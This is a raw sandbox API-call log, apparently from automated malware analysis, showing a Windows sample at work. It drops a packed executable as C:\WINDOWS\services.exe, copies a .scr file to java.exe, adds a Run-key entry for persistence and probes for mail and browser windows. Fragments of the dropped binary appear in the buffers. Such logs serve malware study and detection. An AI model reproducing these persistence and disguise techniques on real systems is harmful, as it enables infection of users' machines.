SUCCESS | 0x00000000 | |
| 07:43:04,384 | 504 | NtReadFile |
Buffer => \x11\xad1R.\xfa\xce\xc1\xe1\xfe\xcc\xf6.\xfa\xce\xa1\xea\xa2\x80\x17E\xb0\xf8\xb4.\xfa\xc4\xba\xe1dQ8O\xda\xe1'\xa0\xa4u\xd1\xb4\xd5Ur\xab`\xa5\xd9\x1b\xc7\x17\xb8\xab`\xb2>\x1b\xce\x87\xd4\x1c5>\xf9\xfd\xbe\xe8\x05\xa9\xaa\x07\x12\x06\xb1\\x07
\x8d\x89\xdd\xa9\xa3\x04J\xc2\xe9\x17\xf4\xc2\xe9<\xa4
\xa5\xba'w\xb4\x94\x11#\xa0s:\x98\xf7\xea\xf8\x93\x0e\xeeu\x17\xcd\xce\x00w\x08\x05\x1c\x88\xa0v\xa6\x88Y)\x8a\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8%d\xdb\xf8&\x7f\x90\xec\xa5M\xd7\xf3T\xd8d\xe3\x18$\xbe\xa9v\x92P\xffw\xce\xc7V\xf3\x06W\xa9h?\x9f\xa9\xc0\xd2\x1fV\xeeN\x83V\x83\x02\xa4\xa9\xe9\xb3v FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,384 | 504 | NtWriteFile |
Buffer => \x11\xad1R.\xfa\xce\xc1\xe1\xfe\xcc\xf6.\xfa\xce\xa1\xea\xa2\x80\x17E\xb0\xf8\xb4.\xfa\xc4\xba\xe1dQ8O\xda\xe1'\xa0\xa4u\xd1\xb4\xd5Ur\xab`\xa5\xd9\x1b\xc7\x17\xb8\xab`\xb2>\x1b\xce\x87\xd4\x1c5>\xf9\xfd\xbe\xe8\x05\xa9\xaa\x07\x12\x06\xb1\\x07
\x8d\x89\xdd\xa9\xa3\x04J\xc2\xe9\x17\xf4\xc2\xe9<\xa4
\xa5\xba'w\xb4\x94\x11#\xa0s:\x98\xf7\xea\xf8\x93\x0e\xeeu\x17\xcd\xce\x00w\x08\x05\x1c\x88\xa0v\xa6\x88Y)\x8a\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8%d\xdb\xf8&\x7f\x90\xec\xa5M\xd7\xf3T\xd8d\xe3\x18$\xbe\xa9v\x92P\xffw\xce\xc7V\xf3\x06W\xa9h?\x9f\xa9\xc0\xd2\x1fV\xeeN\x83V\x83\x02\xa4\xa9\xe9\xb3v FileHandle => 0x00000088 |
SUCCESS | 0x00000000 | |
| 07:43:04,384 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000084 |
FAILURE | 3221225489 | |
| 07:43:04,394 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\WINDOWS\services.exe DesiredAccess => 0xc0100080 CreateDisposition => 5 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,394 | 504 | NtWriteFile |
Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PE\x00\x00L\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x0f\x01\x0b\x01\x07\x00\x00 \x00\x00\x00\x10\x00\x00\x00@\x00\x00pg\x00\x00\x00P\x00\x00\x00p\x00\x00\x00\x00@\x00\x00\x10\x00\x00\x00\x02\x00\x00 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,394 | 504 | NtWriteFile |
Buffer => \x00\x00\x00\x00@\x00\x00\xe0UPX2\x00\x00\x00\x00\x00\x10\x00\x00\x00p\x00\x00\x00\x02\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,405 | 504 | NtWriteFile |
Buffer => \xff\x1f\xaa\x90\x00\xecyrJ\xc1B;Ry\xeb\xa0\x0f\xff\xff\xff\xff\x07K\xad^\xd1k\x98F\x81\x00\xcd\x86\xae@\xf9\x8a\xe2):\x9e\xbf\xba\x94\x0b7\x16SGe\xec\x0e\xaa\xff\xff\xff\xff\xe9\xf0\xbd\x8dXO\xad\x7f\xaeJ\x9b![\xd0\xd2\x8b&\x9b\xf3\xd7\xa6\x13\x08\xb1j\xe2\x11\xcf't!\xa4\xff\xff\xff\xff\xab\x009\x1d\x8e\xe8\x95J\xec\x8d\xd7F*\x13\xecS\x11\x03\xd8\x05\xc9\xfc\x05\xe88\xf7\x89\x92\xffb\xe3\xb5\xff\xff\xff\xff\x01\xb6 .\x16\x95n\x9a\xcd
N8\xdd\xe1uO`\x1c\xf1\xdbkernel32.dll\xf7\xfb\xbf\x7f\x8f"%s"\x07%.8x.%c\x01\x00\xc7\x17\xff\xff\xffy.logzincite\x00x\xa4j\xd7V\xb7\xc7\xe8\xdbp $\xee\xce\xff\xff\xff\xff\xbd\xc1\xaf\x0f|\xf5*\xc6\x87G\x13F0\xa8\x01\x95F\xfd\xd8\x98\x80i\xaf\xf7D\x8b\xb1[\xff\xff\xbe\xd7\xff\xff\xff\xff\\x89"\x11 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,405 | 504 | NtWriteFile |
Buffer => \x01\x05\x11n\x85\xdb\x05\x05\x06\x07w/\x01et^\xdb\xf6\xf6\xe1IntmtG\x02Con\x08c\x0ed\xff\xed\xbf\xe1StaMU\x8dl$\x8c\x81\xec<\x057SVWj Y3\xc0\xb6\xed\xbf\xf0\x8d\xbd\xb8\xfd:3\xdb\xf3\xab\xc6\x855\xfe \x01\x067\xf9\x7f[x3N\x80%\x00\x8b\xc6S+\xc7P\x8d\x84=8/\xff\xff\xbfP\x8bE|\xffp\x04\xff\x15\x84\x10@\x00;\xc3\x89El\x0f\x8e\xbe\x02\x03\xf8;\xd9Z\xdb\xfd\xfe|\xd5\x8d\x8588Ph\x92\x11"(\xfb\x91-\x98\x11/$t \x8a\x8c\x05\\xf7\xdf\xdf\xfe\x80\xf9\t\x14\x04/t\x0f\xc6\x84\x05"\\x88\x9c\x059\x07\xdb~{w\x8b= )jejx\x03\xff\xd7\x83\xc0\x03bd\x07`\xed\xb3\x7f\x8bMd\x0f\xaf\xc8QMhX\x11!R\xcdn\xba\xd9\x8d=
t\x83\xc4\x18"\xf6\xe9\xba\xbf\xdaj\x02Sj\x03h\xbe\xc0\x1b\x1c\xf8\xff\xad\xbb\xdd\xbf\xf9h\x0f FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,405 | 504 | NtWriteFile |
Buffer => P\x86o8a\xd5\x0c:}\x10j\x11Y5\xc2n\x8b\xfdET\xc7E\x10D\x83\x07P\xd9j\x01\x80m\xcd\xad
S
\x1a<\x81f\xd0@d\xd9~\xb3;`\x85\xc0t\x15j\xff\xfcTd\xcdd|mXh
\xd6\x98l_\xe3\xff\xc5\xfe^[\x83\xc5t\xc9\xc3\xeb\x8d\xeb\xe0U\x8b\xec\x83\xec,G\xecv)F$\x1bVS\x184\x10\x92\x97\x1b\xffa0\x0b\xd0;\xd3\x89U\xf8M\xc7\x01W\x8b\xff\xef\xc6\xee\xce2\xc0\xe8\x110W\x0cW\x08UY\x83M\xf4\xff\x83e\x85OK\xb7\xfc\xbb?\x00 \x84EO\x04 \xff\xff\xff\x8d\xfcd\x08\x8b\x04\xc1;B\x0ctL3\xd2\x85\xdb~\x11\x8bu\xf89\x04\x96t\x05B\xd6~\xebnO|\xf3\x035!\xf4\x85\xd2|
\x17+\x85\xed\xc3\xfft\xf1\x04;t\xd1\x04v!E\x1b\x96\xcaY
p\x93-K~\x08\x0c\x0f\x06S\xd6\xbe\xb9V\xb0jY\x02;\x07|\x99\x06>\xf8o\xb4\xf7\xc0|\x16mg\xcf FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,405 | 504 | NtWriteFile |
Buffer => N\x8aD\xf9\x04#s\x81\x0b\x1b[\x90\xad\x01\x04s\xa1\x01\xe9\xd2\xad\xfb\xdd6\x0f\xb6\x1a-\xc7\x08\x84\xba\x05H\x06\x0cfn\x9f\xabt< \x85\xb2\xe8\xdc>`\xae\xa3\xd2\xdc\xc4B \x0f\x82\x8f\xf6\xc3_g\x17Pg\x13\x8aYa\xcd\xeb}\x99k\xdfxaZY9\x16\x88\xfc~T\xeb\xad\x06\xe1\xff\x7fYI\x8b\xca\xc1\xe1\x03\x8d<\x10;>}\x13\x8b~\x04@\xcf\xf0\x1e~a99\x08\x89|\x85\xdc8\xe6ON\xc23\x878\xdcs5\xfc\x07\xe1\xee\xb3?
\x06|\xae\xd9\xeb\x10S\x07\x02\xc2\xeb\x13\xdf\x18\x84_\x08\x05\xea+V\xa0$\x08\x85\xf6kS\xeb\xdft%&\x07\xe0\x8bF\xe1m\x07P\xf24_H8Vl\x0eh^\x97\x1e40b~ \xe8\x00\xff73\xdd3
#\x90\x11\x0c\xb5\xdbmR\x8c\xb9\x87@\x0c\x06u\x04\xd4\xd8p\xdb\xadm\xe9\x8b\xc8q\x01\x15nu\xb6\xad\x1d\xdf\x980t\x0eB
\x83\xfaC\xea\x1e^\x07\xe9\x08\xef FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,405 | 504 | NtWriteFile |
Buffer => ;\xdd| {L\xbb\xc4\xfb\xad\xf0\xbeL\xd8\x04s\x138\xbe\xb7\xc0n\xdc\xb5\x97m\x99m\xf9Z|\x141!\xff4\xf0va\xfb!\xa5u\x02\x8b\xde\x13F\xd6|\xc1S\x1d\xac\xc1vsEY\xa4&\xd8W\xc8\xee\xcd\x9d\xc3Y\x0f\xf5\xf0;\xf5\x83\xe8\x03Qh\x1c8\x81\xfe\xa1\xe2\xb6-\xbc\xdc\xbd\xa8\x83\xfe@\x08\x0c\xeb\x07\x08~\x03Z^6\xb8\xdd\xa2\x84$\xffD\x03\x83\xf9\xa0\x0e
l\xbf\xdc\x14P}P^;\xf0~n\xf0\xd3d\x1f~7\xbb~%Y
\x93\x1c\x15C\xa7\x17\xef\xfa\x7fK}\x01FE;\xee|\xdbC\xac\x07h\xc4 -]\xde\xdc_\x1e\x82=\x00\x04q\x11\xc0\xd4\x01\x0c=?L\xc7\x8f\x7f\x10h\x90_\x01\xe3<n\xfch\x15n\x85\xdd`\xea/\xee\x839,t
\x9a\x8c\x1c\xd2\xaf\x06j\xeeY\x08\xcc\x04\x0c\xc8\x08\x8d\xfc5\x04\xfcg\x90\xe6\x97\x85\xc0~!\xfb\x15Q2\x7f\x9a\x10\xfc\x80\xa4\x05\xfdnF\x1e\x9a-E@ FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,405 | 504 | NtWriteFile |
Buffer => u/\xe6m\x05{\xc9\xc0@P\x0e"\x8d\x8c\x99\xad\xc1u\xa7\xc0\x18\x00\x08\x08p\xe3\xcb\xc0\xa1\x18\x80e\xf5h@\xa6i\x9a\xce\xd7\xc7Regiu\xa6i\x9aster\xc0\xf1i\x9an\xd3\x0b\xf2\xf3v\xd0iceMg\x9a\xa6Pro\x13\xfb\xfc\xe0w6v?\xfdszL\xb9M\xe8\x87\x81\xc9V\x0f\x0eH-\xc0,`\x16Z\xd0\x87\xe8\x14S\x1c\xa5\xc9\x0c\x08\xe70X\xc0-m\xf5\xfdu @^\x81\xc4!\xc3c\x07\xb7\xfe/p\xfbj\xde]\xdcA\x89\x06\xcf@_\xebz\xd9@\x8c\xe1\xa39\x17B\x89A\x10\xc0\xc7v\xc7}\x17)\x04
\x1e\x0b\x0cL\x8b\x1d\x04J\x1f\xfd\x9f\x83f\x08\x00\x8d\xd7\xb8\xe0\x1fx\xfb\xc7\x07\x02p\xd3\x8b-\xac\xeb$\xffv\x14\x9bMjO\x0bh\xfa\x1b}"6_\xe0\xeb\xde0+j\xb3\x02\xe2F\x06\xff\xd5<\xd6\xb5\x1b\xc4WP\x083\xac\xceu\xbfh\x110c\x1dp\x7fE\xa8\xc9\xed\xad\xad\xad\x8d/ FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,415 | 504 | NtWriteFile |
Buffer => \xf2\xc7F\x0cBUn\xdb\x12\xad6`\xe6`\x12\xc3K\x7f\x03.:\xb8\xdd\xcf\xc3SJ~\x08\xeaNp\xc5\xb6\xfd\x1d\x90G;\xf9}|\x03\xff\x05|^\xcf\x08\x03F\xc3\xf3\xab\x90T!v{p\x89\xa3u\x05\xd48F\x08#\xca\x95\xda\xe8+\xc8K\xc3\xaf*\xaf\xb7\x12G\xb2\x89^\xb5O\xeb9\xbf\xa7G\xc6\x0f\xf6;\xcf~\x06K\xdf\xc1\xe3\x03S\xdb\xd0\x98k\xffB\xcf\x89V\x04t\xb2\x8b\xcb@5@s\xe1\xc0\xb5Y\xc2g\xa5\xc8k\xd4\xc5m\x11 ~\x13\x08\x8b\xf0\xd3\x81\x1b\xbaT;\x0b@t;\xc2|I\x98P\x90x\xc8\xff^\xa9\xb8\x12\xddw\x9bP\x14Y\xc5;\x8b\xc7\xf7\xd0\xc63\xa7\xbe\xad\xf49\x12\x18}&\x127\x10'|\x8b\x1fm8\xa31\x06i<\xc1gkci\x0eV\xca\x06\xe3\x0c\x13Y\x07\xb3\x99VUe\x10G\xf7;W\xa62\x07HWI;\xc1t\x113\xa3\xb5m\x0b\x0b\xcaC\xc2w9l\xfdV^j\xc2\xe2F FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,415 | 504 | NtWriteFile |
Buffer => \x9a\x1ce\x9b\x0c&\xca\xa4\xb5\xda\xdd\xd4\x9a\x8b\x0c\xcf\x15\x89L\xe1\x8e\xca$O\xa4\xd8\xfc\x1f\xb7z\xb6\x91\xd8\xf8d\x18\xc3\xda\x1e|\xd0&\x1d\xdc\xb1_\x10\xc0\x99W\xc9\x91\xa6f$c$\xdc\xfe\xd9\x1fI\x1e\xdc\xfe\xd0tMW\x8f\xfc\x02\xfc\xab63\xc9_\x89\xfcB\x0c\x8b\x04\x88\xa17Z4\x1e\x0f\xebj\x8d\xe0A>$[\xd3n\x07\x16|\xe7\xce\x1f\x95\xdc\x10`22\xdc\x08C\xf0\xd6;C\x0b%\x14\xa7\x83}\x05Y\x7f\x07\xed\xb2\xf4J\xb3\x84\x82}\x079\x0cS\x1bP\x88~\xd77\x10_\x8co\xc4b\x84\x071l\xc1\xe6\x02V\x81\x82O=\x8d\xbc\x06\xbf\x16^\xe5\x03"me\x8b\xd3s-Up\x90\xe0\xdb9uIa\x83M\x08k~T\xf9_\x82\x18\xbe\\xf6\x8b\x0c\xc8~\x0e9\x0c\x93\x12\xb4\xad\xbb\xd6|\xf6\x03\x1a\x19\x08\xc2\\xeb~\xa3\xdbU\xe2T\xd0\x9dT\xc8\x04v\x06-\x89@0+\xed\x9a\xcb\x08;\x0f\x1a#\xd7n\x8d\xde\x00 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,415 | 504 | NtWriteFile |
Buffer => \xc0\x19\x91$^g\xecE\x8cp\x0c\xa7Jfl\xef\xc9\xde\x16\x13Ou\xca\x0e\x03\xe8e\x9czF\xb1Yh\xd5\x8dPn\x18"\x0b\xb0\xb5\x00R\xad\xb5"\x0c\xb8\xc5y\xb3\xea7\xff\x7f3\xc08\x03t!@\x80<\x03\x00u\xf9\x16\x03\xc3\x8aH\xffp\xa9\x9fz\xac\x0c\xb6\x07\xc6\x00\xac`\x01\xe2\xa9\x16]\x0c\xe8\x91JSRc\xb6U\x10\x8a\x05\xa3\xfc \xfc\x06\xed\xc1\xfc\xef\xc1\x14~J\x89}\xf8K\xb5\xff\x12\x82\x8aD\x05\xe8<\xeev\x102|
\xff\xdd\xbf;\xe2\xc10\xeb\x1a\x8a\xc8j\x1a\x13\x80\xe1\xa8_\xf6\xd9\x99\x1b\xc9\x1bwo\xdb\xf7\xff\xf9 \x19A\x03\xca4\x88\x0eF\x88\xe0#u+\xc4\x0f\xff\xfa\x0cu\xb9\xfcV\x91\x98\xf0ldX\xc3\xb3P\x83\xbfD\xdb\x14\x00\x03\x10o\x01#Eg\xc7@\x13\x8c_~{\xab\xcd\xef\x06\x08\xfe\xdc\xba\x98\x0cvT2\x10\x88m\xae\xeb\xebh\xbdW\xab\xa5\x00
\x0c!\xde:
@;\x98\xebS\xf3\xa5 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,415 | 504 | NtWriteFile |
Buffer => \xc1\xe2\x03\xec\x89\x12sO\xdf\xd8\xe2B\xe0j@G_\xbb\x1d\x01N\x14\xbaP\xe0\xa5+\xa9\xdfrM}\xfcv\x12\xf1o%\x16Q0\xf2\xf5\x8a\x14\x11\x88\x14\x08A}\x88Fo\x92r\xf2\x8dI\xfd\x18\xec*\xc5\xf6\x1bV?;\xc3s \x86\x08cB\x1b\xec\xe6\xa9+\x08\xc1\x1a\x83\x13\xf8\xa0\xb0\xd1\x85\xbb9]q\xe3\x9f\xdfv\xdf\x96\xc1\xffN+\xdft\x14J\x8dtQ\x03\xd7\x8a\x04\x9d\xd0\xf1\xf6
\x88\x04\x0eP\xcbr\xf5\x07]\xdfH\xc14\xd6\x16\x03\x0f\x10\xb9B\xdf\x85-\xb6\xb68f\x06\x8f\xaa\x1f\x10\xbdq+\xe7\x9a\xfcY\xbb\xb8\x13\xb8\x80\xbd\xcd\xd0oHr\x03jxY@\x0cQuC\xb0\xd6\x07\x8f\xf8P\x0b\x13/aX"\x80+T\x8f\x14\x06\x89\xb4@n\x12\x8ckW\x15F[\x83M\xd4;\x05\xe2\x05s\x1dAS\xa9\xee\x05\x08\x077\xf5\xe3\xb9w\x8f\xfc5\xc7\xa3\x17\xf7\xf1\x03\xc3\xa1\x00\x1di\xc0\xfd\x80\xf7W\xfeC\x03\x00\x05\xc3\x9e FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,415 | 504 | NtWriteFile |
Buffer => \xc8\x1a;\xc7v\x02\x03\x1a\xe8Z\xc1G\xe6\xf49 )\x1e\xd1h\xcd\xa4\x11\xf5X:\xd1\xc2O\xbeb\x95\x10#^\xeaZ\x85\x08s\xd1\xd7\x01\xd1\xea\xccms\xb4P!\xeaE\xfc\xf0l\xfb\xef\xdd\xee\x0f\xbf\xcf \x04\x11\x04\x0c1+\xc1\xa5<Gf\x81\xff9\xdf\xad\xa3v|\xe4H\x99+F\x8d\x82G+\xdfp\xbb\xdf\xf2\xba\x06SH*<\x06\x04@\xdf\x03\xcb\x88s\xb4m\xfd\x082\xc9f\xf7\xd9\xdbJ\xb4[j-\xf5\xd2\xc2]B\x0f\x9f\xc1u z\xc1\xeb\xbe\x96\xce\x06\x1d\xc5\x94G\x08kt\xb6L\x97;\xc4 \x8b\xf3\xbdd\x9a\x99\xa4\xa8\xd6\xd16\xc8x\x10\xd3\xe8\x0b\xf6\xdb\xf1\xdd\xaf\x8d\x95\x16\xa40\x1d"\x0eU\xe8
\x8b\x9d\x00-!\x1d\xaa\xd0\x0c/\xb0EGW\x80\x1c\xe8\xbe\x0e@fu\xfb\xa2K\xear\xf0\x15l\xf2\xf6Ec\x1d\xbco\xdft7\x8d\x8dE\x95\x83\xb6\xcb\xab\x05\xe7\xb6\x89cH\xad\xb5\x04\xdaR\xe7\xbepa;\x00\xc1\xea FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,415 | 504 | NtWriteFile |
Buffer => lst\xdd\xf6\xc1\xb6r\x16n\x17empP)h
H\xb1?\xdbn1pF6e Alloc"\xfe\xe6\xde\xdbPr\x08ess\x14W\x15seHandO>\xbb\xc5\x7f\x04epPcatMo\xfe\x05{\xecdulxNam|AAddr\xc3\xce\x02\xe6E#EA\xabl\xd6f\xddTh\x06d|\xe2~Z\xc9\xfem\xf3pyLo\x1cLibrary2\x85/\xdd`\x99A\xf9aForS\x08n
\x80\xb7gRObjq\x14Ex\x82\xd0\x1eVUDe\x17\x0fo8i\x16J\x99\x00gCValu\xd8\x0b\xc7\xb6e,A\x0fOp\x1aKey\x0e\xa7\xd9\l\xef\x0f4\xa6t\x10M\xd7\xf0wsprpfH\xb1|,\xcb\xb25\xf0\x0e\x02\x03\x10\x134\xb2,\xcb\xb29\x04\x17 \x01\xc2\xb2,\xcb\x12
\x02s\x08\xf6\xfe yyPEL\x01\x02\xe0\x00\x0f\x01\x0b\x01\x07\x0e\xf2 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,415 | 504 | NtWriteFile |
Buffer => \x8b\x1e\x83\xee\xfc\x11\xdbs\xe4\x83\xc1\x02\x81\xfd\x00\xf3\xff\xff\x83\xd1\x01\x8d\x14/\x83\xfd\xfcv\x0f\x8a\x02B\x88\x07GIu\xf7\xe9c\xff\xff\xff\x90\x8b\x02\x83\xc2\x04\x89\x07\x83\xc7\x04\x83\xe9\x04w\xf1\x01\xcf\xe9L\xff\xff\xff^\x89\xf7\xb9t\x00\x00\x00\x8a\x07G,\xe8<\x01w\xf7\x80?\x01u\xf2\x8b\x07\x8a_\x04f\xc1\xe8\x08\xc1\xc0\x10\x86\xc4)\xf8\x80\xeb\xe8\x01\xf0\x89\x07\x83\xc7\x05\x89\xd8\xe2\xd9\x8d\xbe\x00@\x00\x00\x8b\x07 \xc0tE\x8b_\x04\x8d\x840\x00`\x00\x00\x01\xf3P\x83\xc7\x08\xff\x96d`\x00\x00\x95\x8a\x07G\x08\xc0t\xdc\x89\xf9y\x07\x0f\xb7\x07GPG\xb9WH\xf2\xaeU\xff\x96h`\x00\x00 \xc0t\x07\x89\x03\x83\xc3\x04\xeb\xd8\xff\x96l`\x00\x00a\xe9C\xb8\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,415 | 504 | NtWriteFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8cp\x00\x00dp\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99p\x00\x00tp\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa6p\x00\x00|p\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb1p\x00\x00\x84p\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbcp\x00\x00\xcap\x00\x00\xdap\x00\x00\x00\x00\x00\x00\xe8p\x00\x00\x00\x00\x00\x00\xf6p\x00\x00\x00\x00\x00\x00\x08\x00\x00\x80\x00\x00\x00\x00KERNEL32.DLL\x00ADVAPI32.dll\x00USER32.dll\x00WS2_32.dll\x00\x00\x00LoadLibraryA\x00\x00GetProcAddress\x00\x00ExitProcess\x00\x00\x00RegCloseKey\x00\x00\x00wsprintf FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,675 | 504 | CreateProcessInternalW |
ApplicationName => ProcessId => 1000 CommandLine => "C:\WINDOWS\services.exe" ThreadHandle => 0x00000098 ProcessHandle => 0x00000094 ThreadId => 1004 CreationFlags => 0x00000000 |
SUCCESS | 0x00000001 | |
| 07:43:04,675 | 504 | NtOpenFile |
ShareAccess => 7 FileName => C:\WINDOWS\java.exe DesiredAccess => 0x00100100 FileHandle => 0x00000000 |
FAILURE | 3221225524 | |
| 07:43:04,675 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\WINDOWS\java.exe DesiredAccess => 0x40100080 CreateDisposition => 5 FileHandle => 0x00000088 |
SUCCESS | 0x00000000 | |
| 07:43:04,715 | 504 | DeleteFileA |
FileName => C:\WINDOWS\java.exe |
SUCCESS | 0x00000001 | |
| 07:43:04,715 | 504 | CopyFileA |
ExistingFileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\document.scr NewFileName => C:\WINDOWS\java.exe |
SUCCESS | 0x00000001 | |
| 07:43:04,715 | 504 | RegOpenKeyExA |
Handle => 0x00000084 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Run |
SUCCESS | 0x00000000 | |
| 07:43:04,715 | 504 | RegSetValueExA |
Handle => 0x00000084 Buffer => C:\WINDOWS\java.exe\x00 ValueName => JavaVM Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:04,715 | 504 | RegCloseKey |
Handle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,725 | 504 | LdrGetDllHandle |
ModuleHandle => 0x7c800000 FileName => kernel32.dll |
SUCCESS | 0x00000000 | |
| 07:43:04,725 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RegisterServiceProcess FunctionAddress => 0x0012fce8 ModuleHandle => 0x7c800000 |
FAILURE | 3221225785 | |
| 07:43:04,725 | 504 | CreateThread |
ThreadId => 348 StartRoutine => 0x0050311c Parameter => 0x00000000 CreationFlags => 0 |
SUCCESS | 0x00000084 | |
| 07:43:04,725 | 504 | NtDelayExecution |
Milliseconds => 35000 |
SUCCESS | 0x00000000 | |
| 07:43:04,735 | 348 | FindWindowA |
ClassName => rctrl_renwnd32 WindowName => |
FAILURE | 0x00000000 | |
| 07:43:04,735 | 348 | FindWindowA |
ClassName => ATH_Note WindowName => |
FAILURE | 0x00000000 | |
| 07:43:04,735 | 348 | FindWindowA |
ClassName => IEFrame WindowName => |
FAILURE | 0x00000000 | |
| 07:43:04,735 | 348 | ExitThread |
ExitCode => 0 |
SUCCESS | 0x00000000 | |
| 07:43:39,725 | 504 | CreateThread |
ThreadId => 1308 StartRoutine => 0x00504c1b Parameter => 0x00000000 CreationFlags => 0 |
SUCCESS | 0x00000088 | |
| 07:43:39,725 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x00000000 FileName => wininet.dll |
FAILURE | 3221225781 | 1 time |
| 07:43:39,775 | 1308 | LdrLoadDll |
Flags => 12713772 BaseAddress => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:39,785 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:39,785 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => FromCacheTimeout Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:39,785 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => SecureProtocols Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:39,785 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => CertificateRevocation Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:39,785 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => DisableKeepAlive Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:39,785 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => DisablePassport Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:39,785 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => CacheMode Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:39,795 | 1308 | RegOpenKeyExA |
Handle => 0x000000b0 Registry => 0x80000002 SubKey => SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
